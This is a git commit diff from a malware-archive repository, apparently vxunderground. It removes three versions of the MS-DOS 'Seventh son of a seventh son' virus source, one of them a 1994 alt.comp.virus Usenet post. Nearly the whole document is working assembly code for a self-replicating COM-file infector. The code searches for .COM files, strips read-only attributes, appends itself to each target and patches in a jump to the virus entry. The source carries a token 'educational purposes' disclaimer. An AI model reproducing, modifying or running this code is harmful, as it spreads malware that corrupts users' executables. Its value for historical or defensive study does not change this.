fix/re-organize

vxunderground 2022-08-21 04:12:28 -05:00
parent 4b9382ddbc
commit 62ca392943
8 changed files with 0 additions and 701 deletions


@ -1,251 +0,0 @@
From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994
Xref: netcom.com alt.comp.virus:506
Path: netcom.com!ix.netcom.com!netnews
From: Zeppelin@ix.netcom.com (Mr. G)
Newsgroups: alt.comp.virus
Subject: 7th Son Virus
Date: 29 Nov 1994 13:02:59 GMT
Organization: Netcom
Lines: 236
Distribution: world
Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com>
References: <sbringerD00yHv.Hs3@netcom.com> <bradleymD011vJ.Lp8@netcom.com>
NNTP-Posting-Host: ix-pas2-10.ix.netcom.com
;***********************************************************************
*****
;* Seventh son of a seventh son version 4
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;***********************************************************************
*****
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
.RADIX 16
FILELEN equ end - start
MINTARGET equ 1000d
MAXTARGET equ -(FILELEN+40)
;***********************************************************************
*****
;* Dummy program (infected)
;***********************************************************************
*****
org 100
begin: db 4Dh ;virus mark
db 0E9h, 4, 0 ;jump to virus entry
;***********************************************************************
*****
;* Begin of the virus
;***********************************************************************
*****
start: db 0CDh, 20h, 0, 0
cld
mov si,0100h
push si ;push new IP on stack
mov di,si
add si,[si+2] ;si -> start
push si ;restore original begin
movsw
movsw
pop si
mov ax,3300h ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
lea dx,[si+(offset ni24 - 0104)] ;set new int24
vector
mov ah,25h
push ax
int 21
mov ah,2Fh ;get DTA adres
int 21
push es
push bx
add dx,070h ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
push dx
lea di,[si+(offset generation-0104)] ;check
generation
cmp [di],0707h
jne verder
lea dx,[di+2] ;7th son of a 7th son!
mov ah,09h
int 21
verder: mov ax,[di] ;update generations
xchg ah,al
mov al,1
mov [di],ax
lea dx,[di+33d] ;find first COM-file
xor cx,cx
mov ah,4Eh
infloop: int 21
pop dx
jc stop
push dx
xor cx,cx ;clear
read-only-arttribute
mov ax,4301
int 21
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
mov dx,si
mov ah,3fh
int 21
cmp byte ptr [si],4Dh ;already infected or an
EXE?
je return2
cmp byte ptr [si],5Ah ;or a weird EXE?
je return2
mov al,2 ;go to end of file
call seek
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of
file
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
xchg ax,bp
mov al,0 ;go to begin of file
call seek
mov word ptr [si],0E94Dh ;write mark and
jump-command
mov word ptr [si+2],bp
mov ah,40h
int 21
inc byte ptr [di] ;number of next son
return2: pop dx ;restore file date &
time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: mov ah,4Fh ;find next file
jmp short infloop
stop: pop dx ;restore DTA adres
pop ds
mov ah,1Ah
int 21
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
push cs
push cs
pop ds
pop es
ret
seek: mov ah,42
cwd
int21: xor cx,cx
int 21
mov cl,4
mov dx,si
ret
;***********************************************************************
*****
;* Interupt handler 24
;***********************************************************************
*****
ni24: mov al,03
iret
;***********************************************************************
*****
;* Data
;***********************************************************************
*****
generation db 1,1
sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'
filename db '*.COM',0
db '‚¨°³±'
end:
cseg ends
end begin


@ -1,232 +0,0 @@
;****************************************************************************
;* Seventh son of a seventh son version 2
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
FILELEN equ end - start
MINTARGET equ 1000
MAXTARGET equ -(FILELEN+40h)
org 100h
.RADIX 16
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
begin: db 4Dh
jmp start
;****************************************************************************
;* Begin of the virus
;****************************************************************************
start: call start2
start2: pop bp
sub bp,0103h
lea si,[bp+offset begbuf-4] ;restore begin of file
mov di,0100h
movsw
movsw
mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
mov dx,offset ni24 - 4 ;set new int24 vector
add dx,bp
mov ax,2524h
int 21
lea dx,[bp+offset end] ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
mov word ptr [bp+offset nameptr-4],dx
lea si,[bp+offset grandfather-4] ;check generation
cmp [si],0606h
jne verder
lea dx,[bp+offset sontxt-4] ;7th son of a 7th son!
mov ah,09h
int 21
verder: mov ax,[si] ;update generations
xchg ah,al
xor al,al
mov [si],ax
lea dx,[bp+offset filename-4] ;find first COM-file
xor cx,cx
mov ah,4Eh
int 21
infloop: mov dx,word ptr [bp+offset nameptr-4]
call infect
mov ah,4Fh ;find next file
int 21
jnc infloop
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
push cs
push cs
pop ds
pop es
mov ax,0100h ;put old start-adres on stack
push ax
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov ax,4300h ;ask attributes
int 21
push cx
xor cx,cx ;clear flags
call setattr
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
lea dx,[bp+offset begbuf-4]
mov ah,3fh
int 21
mov al,byte ptr [bp+begbuf-4] ;already infected?
cmp al,4Dh
je return2
cmp al,5Ah ;or a weird EXE?
je return2
call endptr ;get file-length
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of file
lea dx,[bp+offset start-4]
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
sub ax,4 ;calculate new start-adres
mov word ptr [bp+newbeg-2],ax
call beginptr ;write new begin of file
mov cx,4
lea dx,[bp+offset newbeg-4]
mov ah,40h
int 21
inc byte ptr [si] ;number of next son
return2: pop dx ;restore file date & time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: pop cx ;restore file-attribute
; call setattr
; ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: mov dx,word ptr [bp+offset nameptr-4]
mov ax,4301h
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov ax,4200h ;go to begin of file
jmp short ptrvrdr
endptr: mov ax,4202h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
int 21
ret
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Data
;****************************************************************************
begbuf db 0CDh, 20h, 0, 0
newbeg db 4Dh, 0E9h, 0, 0
nameptr dw ?
sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'
grandfather db 0
father db 0
filename db '*.COM',0
db '‚¨°³±'
end:
cseg ends
end begin



@ -1,218 +0,0 @@
;****************************************************************************
;* Seventh son of a seventh son version 4
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
.RADIX 16
FILELEN equ end - start
MINTARGET equ 1000d
MAXTARGET equ -(FILELEN+40)
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
org 100
begin: db 4Dh ;virus mark
db 0E9h, 4, 0 ;jump to virus entry
;****************************************************************************
;* Begin of the virus
;****************************************************************************
start: db 0CDh, 20h, 0, 0
cld
mov si,0100h
push si ;push new IP on stack
mov di,si
add si,[si+2] ;si -> start
push si ;restore original begin
movsw
movsw
pop si
mov ax,3300h ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
lea dx,[si+(offset ni24 - 0104)] ;set new int24 vector
mov ah,25h
push ax
int 21
mov ah,2Fh ;get DTA adres
int 21
push es
push bx
add dx,070h ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
push dx
lea di,[si+(offset generation-0104)] ;check generation
cmp [di],0707h
jne verder
lea dx,[di+2] ;7th son of a 7th son!
mov ah,09h
int 21
verder: mov ax,[di] ;update generations
xchg ah,al
mov al,1
mov [di],ax
lea dx,[di+33d] ;find first COM-file
xor cx,cx
mov ah,4Eh
infloop: int 21
pop dx
jc stop
push dx
xor cx,cx ;clear read-only-arttribute
mov ax,4301
int 21
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
mov dx,si
mov ah,3fh
int 21
cmp byte ptr [si],4Dh ;already infected or an EXE?
je return2
cmp byte ptr [si],5Ah ;or a weird EXE?
je return2
mov al,2 ;go to end of file
call seek
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of file
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
xchg ax,bp
mov al,0 ;go to begin of file
call seek
mov word ptr [si],0E94Dh ;write mark and jump-command
mov word ptr [si+2],bp
mov ah,40h
int 21
inc byte ptr [di] ;number of next son
return2: pop dx ;restore file date & time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: mov ah,4Fh ;find next file
jmp short infloop
stop: pop dx ;restore DTA adres
pop ds
mov ah,1Ah
int 21
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
push cs
push cs
pop ds
pop es
ret
seek: mov ah,42
cwd
int21: xor cx,cx
int 21
mov cl,4
mov dx,si
ret
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Data
;****************************************************************************
generation db 1,1
sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'
filename db '*.COM',0
db '‚¨°³±'
end:
cseg ends
end begin


BIN
MSDOS/Virus.MSDOS.7son.7z Normal file

Binary file not shown.